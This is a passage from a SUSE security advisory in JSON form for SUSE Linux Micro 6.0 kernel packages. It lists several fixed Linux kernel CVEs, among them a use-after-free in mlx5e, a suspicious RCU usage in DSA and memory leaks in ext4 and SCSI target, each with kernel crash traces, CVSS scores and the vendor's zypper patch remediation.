"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54143"
},
{
"cve": "CVE-2023-54145",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54145"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: drop unnecessary user-triggerable WARN_ONCE in verifierl log\n\nIt\u0027s trivial for user to trigger \"verifier log line truncated\" warning,\nas verifier has a fixed-sized buffer of 1024 bytes (as of now), and there are at\nleast two pieces of user-provided information that can be output through\nthis buffer, and both can be arbitrarily sized by user:\n - BTF names;\n - BTF.ext source code lines strings.\n\nVerifier log buffer should be properly sized for typical verifier state\noutput. But it\u0027s sort-of expected that this buffer won\u0027t be long enough\nin some circumstances. So let\u0027s drop the check. In any case code will\nwork correctly, at worst truncating a part of a single line output.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54145",
"url": "https://www.suse.com/security/cve/CVE-2023-54145"
},
{
"category": "external",
"summary": "SUSE Bug 1256090 for CVE-2023-54145",
"url": "https://bugzilla.suse.com/1256090"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 0,
"baseSeverity": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54145"
},
{
"cve": "CVE-2023-54148",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54148"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5e: Move representor neigh cleanup to profile cleanup_tx\n\nFor IP tunnel encapsulation in ECMP (Equal-Cost Multipath) mode, as\nthe flow is duplicated to the peer eswitch, the related neighbour\ninformation on the peer uplink representor is created as well.\n\nIn the cited commit, eswitch devcom unpair is moved to uplink unload\nAPI, specifically the profile-\u003ecleanup_tx. If there is a encap rule\noffloaded in ECMP mode, when one eswitch does unpair (because of\nunloading the driver, for instance), and the peer rule from the peer\neswitch is going to be deleted, the use-after-free error is triggered\nwhile accessing neigh info, as it is already cleaned up in uplink\u0027s\nprofile-\u003edisable, which is before its profile-\u003ecleanup_tx.\n\nTo fix this issue, move the neigh cleanup to profile\u0027s cleanup_tx\ncallback, and after mlx5e_cleanup_uplink_rep_tx is called. The neigh\ninit is moved to init_tx for symmeter.\n\n[ 2453.376299] BUG: KASAN: slab-use-after-free in mlx5e_rep_neigh_entry_release+0x109/0x3a0 [mlx5_core]\n[ 2453.379125] Read of size 4 at addr ffff888127af9008 by task modprobe/2496\n\n[ 2453.381542] CPU: 7 PID: 2496 Comm: modprobe Tainted: G B 6.4.0-rc7+ #15\n[ 2453.383386] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.13.0-0-gf21b5a4aeb02-prebuilt.qemu.org 04/01/2014\n[ 2453.384335] Call Trace:\n[ 2453.384625] \u003cTASK\u003e\n[ 2453.384891] dump_stack_lvl+0x33/0x50\n[ 2453.385285] print_report+0xc2/0x610\n[ 2453.385667] ? __virt_addr_valid+0xb1/0x130\n[ 2453.386091] ? mlx5e_rep_neigh_entry_release+0x109/0x3a0 [mlx5_core]\n[ 2453.386757] kasan_report+0xae/0xe0\n[ 2453.387123] ? mlx5e_rep_neigh_entry_release+0x109/0x3a0 [mlx5_core]\n[ 2453.387798] mlx5e_rep_neigh_entry_release+0x109/0x3a0 [mlx5_core]\n[ 2453.388465] mlx5e_rep_encap_entry_detach+0xa6/0xe0 [mlx5_core]\n[ 2453.389111] mlx5e_encap_dealloc+0xa7/0x100 [mlx5_core]\n[ 2453.389706] mlx5e_tc_tun_encap_dests_unset+0x61/0xb0 [mlx5_core]\n[ 2453.390361] mlx5_free_flow_attr_actions+0x11e/0x340 [mlx5_core]\n[ 2453.391015] ? complete_all+0x43/0xd0\n[ 2453.391398] ? free_flow_post_acts+0x38/0x120 [mlx5_core]\n[ 2453.392004] mlx5e_tc_del_fdb_flow+0x4ae/0x690 [mlx5_core]\n[ 2453.392618] mlx5e_tc_del_fdb_peers_flow+0x308/0x370 [mlx5_core]\n[ 2453.393276] mlx5e_tc_clean_fdb_peer_flows+0xf5/0x140 [mlx5_core]\n[ 2453.393925] mlx5_esw_offloads_unpair+0x86/0x540 [mlx5_core]\n[ 2453.394546] ? mlx5_esw_offloads_set_ns_peer.isra.0+0x180/0x180 [mlx5_core]\n[ 2453.395268] ? down_write+0xaa/0x100\n[ 2453.395652] mlx5_esw_offloads_devcom_event+0x203/0x530 [mlx5_core]\n[ 2453.396317] mlx5_devcom_send_event+0xbb/0x190 [mlx5_core]\n[ 2453.396917] mlx5_esw_offloads_devcom_cleanup+0xb0/0xd0 [mlx5_core]\n[ 2453.397582] mlx5e_tc_esw_cleanup+0x42/0x120 [mlx5_core]\n[ 2453.398182] mlx5e_rep_tc_cleanup+0x15/0x30 [mlx5_core]\n[ 2453.398768] mlx5e_cleanup_rep_tx+0x6c/0x80 [mlx5_core]\n[ 2453.399367] mlx5e_detach_netdev+0xee/0x120 [mlx5_core]\n[ 2453.399957] mlx5e_netdev_change_profile+0x84/0x170 [mlx5_core]\n[ 2453.400598] mlx5e_vport_rep_unload+0xe0/0xf0 [mlx5_core]\n[ 2453.403781] mlx5_eswitch_unregister_vport_reps+0x15e/0x190 [mlx5_core]\n[ 2453.404479] ? mlx5_eswitch_register_vport_reps+0x200/0x200 [mlx5_core]\n[ 2453.405170] ? up_write+0x39/0x60\n[ 2453.405529] ? kernfs_remove_by_name_ns+0xb7/0xe0\n[ 2453.405985] auxiliary_bus_remove+0x2e/0x40\n[ 2453.406405] device_release_driver_internal+0x243/0x2d0\n[ 2453.406900] ? kobject_put+0x42/0x2d0\n[ 2453.407284] bus_remove_device+0x128/0x1d0\n[ 2453.407687] device_del+0x240/0x550\n[ 2453.408053] ? waiting_for_supplier_show+0xe0/0xe0\n[ 2453.408511] ? kobject_put+0xfa/0x2d0\n[ 2453.408889] ? __kmem_cache_free+0x14d/0x280\n[ 2453.409310] mlx5_rescan_drivers_locked.part.0+0xcd/0x2b0 [mlx5_core]\n[ 2453.409973] mlx5_unregister_device+0x40/0x50 [mlx5_core]\n[ 2453.410561] mlx5_uninit_one+0x3d/0x110 [mlx5_core]\n[ 2453.411111] remove_one+0x89/0x130 [mlx5_core]\n[ 24\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54148",
"url": "https://www.suse.com/security/cve/CVE-2023-54148"
},
{
"category": "external",
"summary": "SUSE Bug 1256084 for CVE-2023-54148",
"url": "https://bugzilla.suse.com/1256084"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54148"
},
{
"cve": "CVE-2023-54149",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54149"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: dsa: avoid suspicious RCU usage for synced VLAN-aware MAC addresses\n\nWhen using the felix driver (the only one which supports UC filtering\nand MC filtering) as a DSA master for a random other DSA switch, one can\nsee the following stack trace when the downstream switch ports join a\nVLAN-aware bridge:\n\n=============================\nWARNING: suspicious RCU usage\n-----------------------------\nnet/8021q/vlan_core.c:238 suspicious rcu_dereference_protected() usage!\n\nstack backtrace:\nWorkqueue: dsa_ordered dsa_slave_switchdev_event_work\nCall trace:\n lockdep_rcu_suspicious+0x170/0x210\n vlan_for_each+0x8c/0x188\n dsa_slave_sync_uc+0x128/0x178\n __hw_addr_sync_dev+0x138/0x158\n dsa_slave_set_rx_mode+0x58/0x70\n __dev_set_rx_mode+0x88/0xa8\n dev_uc_add+0x74/0xa0\n dsa_port_bridge_host_fdb_add+0xec/0x180\n dsa_slave_switchdev_event_work+0x7c/0x1c8\n process_one_work+0x290/0x568\n\nWhat it\u0027s saying is that vlan_for_each() expects rtnl_lock() context and\nit\u0027s not getting it, when it\u0027s called from the DSA master\u0027s ndo_set_rx_mode().\n\nThe caller of that - dsa_slave_set_rx_mode() - is the slave DSA\ninterface\u0027s dsa_port_bridge_host_fdb_add() which comes from the deferred\ndsa_slave_switchdev_event_work().\n\nWe went to great lengths to avoid the rtnl_lock() context in that call\npath in commit 0faf890fc519 (\"net: dsa: drop rtnl_lock from\ndsa_slave_switchdev_event_work\"), and calling rtnl_lock() is simply not\nan option due to the possibility of deadlocking when calling\ndsa_flush_workqueue() from the call paths that do hold rtnl_lock() -\nbasically all of them.\n\nSo, when the DSA master calls vlan_for_each() from its ndo_set_rx_mode(),\nthe state of the 8021q driver on this device is really not protected\nfrom concurrent access by anything.\n\nLooking at net/8021q/, I don\u0027t think that vlan_info-\u003evid_list was\nparticularly designed with RCU traversal in mind, so introducing an RCU\nread-side form of vlan_for_each() - vlan_for_each_rcu() - won\u0027t be so\neasy, and it also wouldn\u0027t be exactly what we need anyway.\n\nIn general I believe that the solution isn\u0027t in net/8021q/ anyway;\nvlan_for_each() is not cut out for this task. DSA doesn\u0027t need rtnl_lock()\nto be held per se - since it\u0027s not a netdev state change that we\u0027re\nblocking, but rather, just concurrent additions/removals to a VLAN list.\nWe don\u0027t even need sleepable context - the callback of vlan_for_each()\njust schedules deferred work.\n\nThe proposed escape is to remove the dependency on vlan_for_each() and\nto open-code a non-sleepable, rtnl-free alternative to that, based on\ncopies of the VLAN list modified from .ndo_vlan_rx_add_vid() and\n.ndo_vlan_rx_kill_vid().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54149",
"url": "https://www.suse.com/security/cve/CVE-2023-54149"
},
{
"category": "external",
"summary": "SUSE Bug 1256085 for CVE-2023-54149",
"url": "https://bugzilla.suse.com/1256085"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.8,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54149"
},
{
"cve": "CVE-2023-54153",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54153"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\next4: turn quotas off if mount failed after enabling quotas\n\nYi found during a review of the patch \"ext4: don\u0027t BUG on inconsistent\njournal feature\" that when ext4_mark_recovery_complete() returns an error\nvalue, the error handling path does not turn off the enabled quotas,\nwhich triggers the following kmemleak:\n\n================================================================\nunreferenced object 0xffff8cf68678e7c0 (size 64):\ncomm \"mount\", pid 746, jiffies 4294871231 (age 11.540s)\nhex dump (first 32 bytes):\n00 90 ef 82 f6 8c ff ff 00 00 00 00 41 01 00 00 ............A...\nc7 00 00 00 bd 00 00 00 0a 00 00 00 48 00 00 00 ............H...\nbacktrace:\n[\u003c00000000c561ef24\u003e] __kmem_cache_alloc_node+0x4d4/0x880\n[\u003c00000000d4e621d7\u003e] kmalloc_trace+0x39/0x140\n[\u003c00000000837eee74\u003e] v2_read_file_info+0x18a/0x3a0\n[\u003c0000000088f6c877\u003e] dquot_load_quota_sb+0x2ed/0x770\n[\u003c00000000340a4782\u003e] dquot_load_quota_inode+0xc6/0x1c0\n[\u003c0000000089a18bd5\u003e] ext4_enable_quotas+0x17e/0x3a0 [ext4]\n[\u003c000000003a0268fa\u003e] __ext4_fill_super+0x3448/0x3910 [ext4]\n[\u003c00000000b0f2a8a8\u003e] ext4_fill_super+0x13d/0x340 [ext4]\n[\u003c000000004a9489c4\u003e] get_tree_bdev+0x1dc/0x370\n[\u003c000000006e723bf1\u003e] ext4_get_tree+0x1d/0x30 [ext4]\n[\u003c00000000c7cb663d\u003e] vfs_get_tree+0x31/0x160\n[\u003c00000000320e1bed\u003e] do_new_mount+0x1d5/0x480\n[\u003c00000000c074654c\u003e] path_mount+0x22e/0xbe0\n[\u003c0000000003e97a8e\u003e] do_mount+0x95/0xc0\n[\u003c000000002f3d3736\u003e] __x64_sys_mount+0xc4/0x160\n[\u003c0000000027d2140c\u003e] do_syscall_64+0x3f/0x90\n================================================================\n\nTo solve this problem, we add a \"failed_mount10\" tag, and call\next4_quota_off_umount() in this tag to release the enabled qoutas.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54153",
"url": "https://www.suse.com/security/cve/CVE-2023-54153"
},
{
"category": "external",
"summary": "SUSE Bug 1256081 for CVE-2023-54153",
"url": "https://bugzilla.suse.com/1256081"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54153"
},
{
"cve": "CVE-2023-54154",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54154"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: target: core: Fix target_cmd_counter leak\n\nThe target_cmd_counter struct allocated via target_alloc_cmd_counter() is\nnever freed, resulting in leaks across various transport types, e.g.:\n\n unreferenced object 0xffff88801f920120 (size 96):\n comm \"sh\", pid 102, jiffies 4294892535 (age 713.412s)\n hex dump (first 32 bytes):\n 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\n 00 00 00 00 00 00 00 00 38 01 92 1f 80 88 ff ff ........8.......\n backtrace:\n [\u003c00000000e58a6252\u003e] kmalloc_trace+0x11/0x20\n [\u003c0000000043af4b2f\u003e] target_alloc_cmd_counter+0x17/0x90 [target_core_mod]\n [\u003c000000007da2dfa7\u003e] target_setup_session+0x2d/0x140 [target_core_mod]\n [\u003c0000000068feef86\u003e] tcm_loop_tpg_nexus_store+0x19b/0x350 [tcm_loop]\n [\u003c000000006a80e021\u003e] configfs_write_iter+0xb1/0x120\n [\u003c00000000e9f4d860\u003e] vfs_write+0x2e4/0x3c0\n [\u003c000000008143433b\u003e] ksys_write+0x80/0xb0\n [\u003c00000000a7df29b2\u003e] do_syscall_64+0x42/0x90\n [\u003c0000000053f45fb8\u003e] entry_SYSCALL_64_after_hwframe+0x6e/0xd8\n\nFree the structure alongside the corresponding iscsit_conn / se_sess\nparent.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54154",
"url": "https://www.suse.com/security/cve/CVE-2023-54154"
},
{
"category": "external",
"summary": "SUSE Bug 1256082 for CVE-2023-54154",
"url": "https://bugzilla.suse.com/1256082"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
